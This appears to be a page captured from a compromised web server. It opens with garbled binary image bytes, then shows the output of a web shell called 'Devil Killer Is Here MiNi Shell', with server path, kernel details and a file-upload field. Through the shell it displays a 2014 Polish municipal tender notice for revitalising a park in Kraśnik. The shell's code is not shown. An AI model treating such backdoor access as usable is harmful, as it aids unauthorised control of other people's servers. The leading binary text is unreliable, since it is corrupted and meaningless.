JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140429/92579-N-2014.html

<p class="kh_header"><b>Kraśnik: Rewitalizacja Parku im. Jana Pawła II</b><br>
<b>Numer ogłoszenia: 92579 - 2014; data zamieszczenia: 29.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Kraśnik , ul. Lubelska 84, 23-200 Kraśnik, woj. lubelskie, tel. 81 8251540, faks 81 8252709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krasnik.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja Parku im. Jana Pawła II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest rewitalizacja Parku im. Jana Pawła II w Kraśniku w oparciu o dokumentację projektową  stanowiącą załącznik do SIWZ. Teren budowy położony jest na działkach nr ew. 1/4, 84/3, 101, 132, 133/1, 133/2, 133/3, 133/4, 134/1, 134/2, 134/3, 142/20, 142/23 obręb Ośrodek m. Kraśnik; działkach nr ew. 551/1, 551/10, 552/1 obręb Zarzecze II m. Kraśnik.
2.Wykonawca wykonując przedmiot zamówienia uwzględni wymagania zawarte w projekcie budowlanym, wykonawczym oraz szczegółowych specyfikacjach technicznych. 
3.Przedmiot zamówienia obejmuje:
1)Budowę alejek parkowych wraz z pomostami dla pieszych na rowie melioracyjnym:
1.1Roboty przygotowawcze:
a)karczowanie pni znajdujących się na terenie parku,
b)roboty ziemne,
c)rozebranie podbudowy, płyt chodnikowych, krawężników, obrzeży betonowych, elementów pomostu z transportem na odległość do 1 km,
d)oczyszczenie rowu przebiegającego przez park na odcinku zapewniającym odpływ wody o długości 872,90 m. 
1.2Roboty budowlane:
a)konstrukcja nawierzchni ciągu pieszo - jezdnego o pow.1880,82 m2:
nawierzchnia z kostki brukowej betonowej gr. 8 cm,
podsypka cem.-piask. gr. 5 cm,
podbudowa gr. 15 cm z mieszanki niezwiązanej 0/31,5,
warstwa mrozochronna gr. 20 cm z mieszanki związanej cementem klasy C1,5/2,
warstwa ulepszonego podłoża gr. 25 cm z mieszanki niezwiązanej 0/11,2 o CBR powyżej 20%,
ciąg pieszo - jezdny o szerokości 3,0 m.
b)konstrukcja nawierzchni ciągu pieszego i placu widowiskowego:
nawierzchnia z kostki brukowej betonowej gr. 8 cm,
podsypka cem.-piask. gr. 5 cm,
podbudowa gr. 15 cm z mieszanki niezwiązanej 0/31,5,
warstwa ulepszonego podłoża gr. 15 cm z mieszanki związanej cementem klasy C1,5/2,
obramowanie ciągu krawężnikiem betonowym 12 x 25 cm ustawionym na podsypce cem.-piaskowej gr. 5 cm i podbudowie nawierzchni,
plac widowiskowy o wymiarach osiowych 21,7 x 25,7 m,
ciąg pieszy o wymiarach 2,5 i 2,0 m.
c)konstrukcja wylotu przepustu:
prefabrykaty betonowe z betonu klasy C45/55 odpornego na obciążenie klasy A,
fundament pod ściankę z betonu klasy C12/15, 
ścianka czołowa przepustu z betony klasy C25/30, 
ława pod przepust z betonu 6-9 MPa, grubości warstwy 30 cm, 
istniejące kręgi betonowe na długości przebudowy należy zdemontować. 
d)konstrukcja ogrodzenia rowu:
ogrodzenie należy wykonać z trzech rzędów desek nieobrzynanych 25 x 150 mm przymocowanych do słupków drewnianych,
wysokość ogrodzenia 1,20 m od powierzchni terenu,
słupki wykonane z okrąglaków o średnicy 20 cm okorowanych, zabezpieczonych przed wpływami atmosferycznymi dla czwartej klasy zabezpieczenia, 
deski z drewna iglastego nieobrzynanego, trzecia klasa zabezpieczenia,
kolor impregnatu ciemny orzech lub brąz.
e)konstrukcja pomostu dla pieszych:
pomost dla pieszych jako typowy leżajowy, którego dźwigary mają postać pojedynczych belek 15x20 cm, wykonywanych z drewna,
przęsło składa się z belek ułożonych w odstępach co 50 cm i swobodnie opartych na podporach drewnianych 20 x 25 cm, 
oczep oparty jest na palach z rur stalowych o średnicy 25 cm,
dylina wykonana będzie z desek 5 x 15 cm ryflowanych, 
poręcze drewniane ze słupkami 12 x 14 cm przymocowanymi do podłużnic i ew. siodełek śrubami M12,
rozstaw słupków 1,25-1,40 m, 
pochwyt drewniany 12 x 14 cm z fazką 1x1 cm,
pasy drewniane 5 x 10 cm.
1.3.Roboty zabezpieczające:
a)sieć elektroenergetyczna - z uwagi na zachowanie istniejących odległości projektowanych elementów względem infrastruktury elektroenergetycznej nie przewiduje się przebudowy sieci elektroenergetycznej. Zabezpieczeniu podlegają kable elektroenergetyczne krzyżujące się z projektowanymi nawierzchniami. 
b)urządzenia wodociągowe i kanalizacyjne - istniejące włazy studni kanalizacji sanitarnej wyregulowane zostaną do projektowanych wysokości kręgami betonowymi o średnicy 1200 mm, i pierścieniami żelbetowymi o średnicy 600 mm. Urządzenia wodociągowe znajdujące się w rejonie budowy wyregulowane zostaną do poziomów projektowanych. Roboty ziemne w pobliżu urządzeń wodociągowych i kanalizacyjnych należy prowadzić ręcznie ze szczególną ostrożnością. 
c)infrastruktura teletechniczna - istniejąca infrastruktura teletechniczna zabezpieczona zostanie rurą przepustową i ławą betonową pod projektowanymi nawierzchniami. Prace związane z zabezpieczeniem infrastruktury teletechnicznej powinny być wykonane w uzgodnieniu ze służbami technicznymi TP.
d)sieć gazowa - zachowane zostanie przykrycie oraz oznakowanie gazociągów. Skrzynki uliczne dostosowane zostaną do proj. poziomu terenu. Przejście gazociągu pod nawierzchniami zostanie zabezpieczone rurami osłonowymi dwudzielnymi z polietylenu PE SDR 17,6 z wyprowadzeniem końców rur 0,50 m poza krawędź jezdni. Końce rur należy uszczelnić. Nad gazociągiem zamontowane zostaną sączki węchowe punkowe. Prace ziemne w pobliżu gazociągu należy prowadzić ręcznie.
2)Budowa oświetlenia parkowego oraz kanalizacji światłowodowej dla systemu monitoringu wizyjnego:
2.1Wykonanie zasilenia złącza oświetleniowego z zestawem gniazdkowym zasilającym scenę.
2.2Dwa obwody oświetleniowe kablem YAKY 5x35 zasilając lampy oświetleniowe.
2.3Równolegle do kabli oświetleniowych ułożyć kanalizację światłowodową ze światłowodem pomiędzy projektowanymi złączami typu ZK1. Nie należy uwzględniać zakupu i montażu kamer do systemu monitoringu wizyjnego.
2.4Latarnie:
a)prefabrykowane słupy aluminiowe, 6-metrowe, czarne, okrągłe, gładkie na odpowiednim fundamencie, ze złączem TB z zabezpieczeniem typu Bi 6A dostosowanym do projektowanego kabla,
b)oprawa przezroczysta z daszkiem odporna na uderzenia.
3)Zagospodarowanie terenu zielenią i małą architekturą:
3.1Nasadzenia drzew i krzewów oraz obsianie trawą powierzchni wskazanej 
w projekcie wykonawczym,
3.2Wykonanie wiaty pełniącej funkcje deszczochronu.
3.3Kosze na śmieci szt. 39. 
3.4Ławki parkowe szt. 66.
3.5Tablice informacyjne - szt. 3.
4)Budowa placu zabaw i siłowni zewnętrznej:
4.1Nasadzenia drzew i krzewów oraz obsianie trawą powierzchni na terenie placu zabaw.
4.2Urządzenia zabawowe - szt. 14:
a)urządzenie obrotowe - 1 szt.,
b)huśtawka wahadłowa podwójna  - 1 szt.,
c)huśtawka wahadłowa typu gniazdko - 2 szt.,
d)huśtawka wagowa typu gniazdko - 1 szt.,
e)zabawka na sprężynie (bujak) - auto  (bryła) - 1 szt.,
f)zabawka na sprężynie (bujak) - konik - 1 szt.,
g)zjazd linowy - 1 szt.,
h)zestaw zabawowy nawiązujący formą do Zamku - 1 szt.,
i)trampoliny (zestaw) - 1 szt.,
j)urządzenie sprawnościowe - 1 szt.,
k)zestaw zabawkowy z domkiem - 1 szt.,
l)zestaw sprawnościowy z równoważnikami - 1 szt.,
m)zestaw zabawowy ze zjeżdżalnią - 1 szt.
4.3Urządzenia sportowo rekreacyjne - szt. 6:
a)biegacz podwójny lub montażu dwóch pojedynczych urządzeń (pełniących taką samą funkcje) obok siebie - 1 szt.,
b)wahadło podwójne - 1 szt.,
c)drążek podwójny - 1szt.,
d)orbitek podwójny lub montażu dwóch pojedynczych urządzeń (pełniących taką samą funkcje) obok siebie - 1 szt.,
e)urządzenie koła TAI CHI - 1 szt.,
f)twister potrójny - 1 szt..
4.4Mała architektura:
a)kosze na śmieci - 3 szt.,
b)ławki parkowe - 3 szt.,
c)tablice informacyjne - 2 szt.,
d)stojaki na rowery - 2 szt.
4.5Wszystkie urządzenia zabawowe muszą spełniać następujące warunki: 
a)posiadać minimum trzyletnią gwarancję, 
b)posiadać wysoką odporność na wpływ warunków atmosferycznych (słońce, deszcz itp.) oraz na uszkodzenia mechaniczne (uderzenia, obciążenia),
c)każde z urządzeń musi posiadać kartę techniczną, instrukcję użytkowania 
i konserwacji, tabliczkę znamionową,
d)urządzenia siłowni zewnętrznej muszą być wyposażone w tablicę informacyjną, odporną na warunki atmosferyczne, z czytelną informacją o funkcji urządzenia 
i sposobie ćwiczeń (instrukcja obrazkowa i literowa). Tablica może być zamontowana na pylonie urządzenia. Nie dopuszcza się stosowania naklejek.
e)urządzenia muszą być zgodne z aktualnie obowiązującymi normami,
f)muszą być fabrycznie nowe i wolne od wad,
g)materiały wykorzystane do produkcji urządzeń: śruby, łańcuchy, sprężyny i inne połączenia oraz elementy zabezpieczające wykorzystane przy produkcji 
i montażu urządzeń, mają posiadać wymagane atesty i dopuszczenia,
h)elementy metalowe, drewniane powinny być pomalowane i zakonserwowane farbami dopuszczonymi do kontaktu z dziećmi oraz odporne na warunki atmosferyczne, 
i)dla każdego z urządzeń należy zachować wymaganą strefę bezpieczeństwa wg wytycznych producenta oraz obowiązujących przepisów.
4.Zamówienie podzielono na dwa następujące etapy wykonalności:
1)etap I obejmujący następujący zakres:
1.1wykonanie infrastruktury podziemnej i nadziemnej w całości,
1.2wykonanie na terenie od rzeki do rowu melioracyjnego:
a)karczowanie pni, roboty rozbiórkowe, niwelacja terenu,
b)budowa alejek pieszych i pieszojezdnych,
c)mała architektura: ławki kosze, wiata i tablice informacyjne,
d)plac zabaw, 
e)nasadzenia drzew, krzewów z wykonaniem trawników.
2)etap II o następującym zakresie wykonania na terenie od rowu do ul. Oboźnej:
1.1karczowanie pni, roboty rozbiórkowe, niwelacja terenu,
1.2budowa alejek pieszych i pieszojezdnych,
1.3mała architektura: ławki kosze, wiata i tablice informacyjne,
1.4oczyszczenie rowu melioracyjnego z wykonaniem kładek, przepustu i ogrodzenia,
1.5siłownie zewnętrzne.
5.Zaleca się, aby Wykonawca dokonał wizji lokalnej, gdzie będą realizowane roboty będące przedmiotem zamówienia oraz zdobył wszelkie informacje, które mogą być konieczne do  przygotowania oferty i podpisania umowy.
6.Realizacja przedmiotu zamówienia winna być wykonana w oparciu o obowiązujące przepisy, a w szczególności ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jedn. Dz. U. z 2013r., poz. 1409 ze zm.) wraz z przepisami wykonawczymi, przez Wykonawcę posiadającego stosowne doświadczenie i potencjał wykonawczy określony w SIWZ oraz przez osoby posiadające odpowiednie kwalifikacje i doświadczenie.
7.Materiały użyte przez Wykonawcę powinny odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, określonym w art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jedn. Dz. U. z 2013r., poz. 1409 ze zm.).
8.Wykonanie przedmiotu zamówienia i oddanie do użytku musi być również zgodne ze wszystkimi aktami prawnymi właściwymi dla przedmiotu zamówienia, z przepisami  techniczno-budowlanymi, obowiązującymi polskimi normami, wytycznymi oraz zasadami wiedzy technicznej.
9.Jeżeli dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót budowlanych wskazywałyby w odniesieniu do niektórych materiałów lub urządzeń znaki  towarowe, patenty lub pochodzenie - zamawiający, zgodnie z art. 29 ust. 3 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych. Materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne parametry jakościowe cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia oferowane przez wykonawcę, aby zostały spełnione wymagania stawiane przez zamawiającego. Materiały lub urządzenia pochodzące od konkretnych producentów stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Pod  pojęciem minimalne parametry jakościowe i cechy użytkowe zamawiający rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych lub lepszych  parametrach. W takiej sytuacji zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały lub urządzenia.
10.Okres gwarancji na wykonane roboty - 3  lata. 
11. Termin  realizacji przedmiotu zamówienia:
I etap do dnia 15.08.2014 r.,
II etap do dnia 20.10.2014 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.11-2, 45.11.27.00-2, 03.12.11.00-6, 77.30.00.00-3, 45.10.00.00-8, 45.23.32.53-7, 45.11.21.00-6, 45.23.23.10-8, 45.31.00.00-3, 45.32.50.00-7, 77.21.16.00-8, 77.31.00.00-6, 77.31.41.00-5, 37.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium w wysokości 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych), które może być wnoszone w:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. z 2007 r. Nr 42, poz. 275 ze zm.)
2.Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Polska Kasa Opieki S.A. nr 46 1240 5497 1111 0010 4019 7424.
3.Jeżeli wadium zostanie wniesione w pieniądzu przelewem, wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. W tytule przelewu należy wpisać: wadium - przetarg na rewitalizację Parku im. Jana Pawła II.
4.Za wyjątkiem wadium wniesionego w pieniądzu, wymagane jest dołączenie do oferty oryginału dokumentu wystawionego na rzecz Zamawiającego. Oryginał dokumentu należy wpiąć do oferty w koszulce. Dokumenty, o których mowa muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
5.Wadium musi być wniesione przed upływem terminu składania ofert, tj. do 14.05.2014 r. do godz. 11:00 (liczy się data wpływu środków na rachunek bankowy Zamawiającego).
6.Wykonawca, który nie wniósł wadium zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.
7.Wykonawcy, którzy wnieśli wadium nie stanowiące całości wymaganej kwoty lub, gdy forma jest niezgodna z działem XII pkt 1 SIWZ - są wykluczeni.
8.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
9.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
10.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca na wezwanie Zamawiającego nie uzupełni wymaganych dokumentów, oświadczeń lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn niezależnych od niego.
13.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
14.Wykonawca traci wadium na rzecz zamawiającego, jeżeli:
-odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-nie wniesie zabezpieczenia należytego wykonania umowy,
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. Na potwierdzenie spełnienia warunku dotyczącego posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania należy przedłożyć oświadczenie stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia oceniony zostanie na podstawie wykazu (załącznik nr 3 do SIWZ):
1)robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju, wartości, daty i miejsca wykonania z załączeniem dowodów określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej 
i prawidłowo ukończone:
a)co najmniej 2 zadania polegające na budowie dróg, chodników, parkingów lub ścieżek rowerowych o nawierzchni z kostki brukowej o powierzchni min. 3000 m2 każde z zadań oraz
b)co najmniej 2 zadań polegających na wykonaniu oświetlenia ulicznego lub/i parkowego o wartości minimum 200 000,00 zł brutto każde oraz,
2)usług wykonanych/wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, tj.:
a)co najmniej 2 zadań polegających na wykonaniu/wykonywaniu usług dotyczących nasadzeń drzew i/lub krzewów i/lub bylin o wartości co najmniej 50 000,00 zł brutto każde oraz
b)co najmniej 1 zadania polegającego na założeniu trawników o powierzchni min. 2000 m2.
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże się należycie wykonanymi, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonymi: 
a)co najmniej 2 zadaniami polegającymi na budowie dróg, chodników, parkingów lub ścieżek rowerowych o nawierzchni z kostki brukowej o powierzchni min. 3000 m2 każde oraz
b)co najmniej 2 zadaniami polegającymi na wykonaniu oświetlenia ulicznego lub/i parkowego o wartości minimum 200 000,00 zł brutto każde oraz,
jeżeli wykonawca wykaże się należycie wykonanymi:
a)co najmniej 2 zadaniami polegającymi na wykonaniu/wykonywaniu usług dotyczących nasadzeń drzew i/lub krzewów i/lub bylin o wartości co najmniej 50 000,00zł brutto każde oraz
b)co najmniej 1 zadaniem polegającym na założeniu trawników o powierzchni min. 2000 m2.

Wartość podaną w walutach innych niż PLN wykonawca przeliczy wg średniego kursu NBP na dzień ogłoszenia bieżącego postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku dotyczącego dysponowania odpowiednim potencjałem technicznym. Warunek ten oceniony zostanie na podstawie oświadczenia (zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (wzór stanowi załącznik nr 4 do SIWZ). Warunek zostanie uznany za spełniony w przypadku, gdy Wykonawca wykaże dysponowanie:
1)	co najmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi 
w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, 
w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz
2)	co najmniej 1 osobą posiadającej uprawnienia do kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz
3)	co najmniej 1 osobą posiadającą wykształcenie wyższe na kierunku ogrodnictwo lub architektura krajobrazu, posiadającą minimum 3-letnie doświadczenie 
w wykonywaniu, nadzorowaniu lub kierowaniu pracami w zakresie zagospodarowywania terenów zielonych. 


Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień, dopuszcza odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, 
z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo budowlane (tekst jedn. Dz. U. z 2013r., poz. 1409 ze zm.) oraz ustawy z dnia 18 marca 2008r o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. nr 63, poz. 394 ze zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
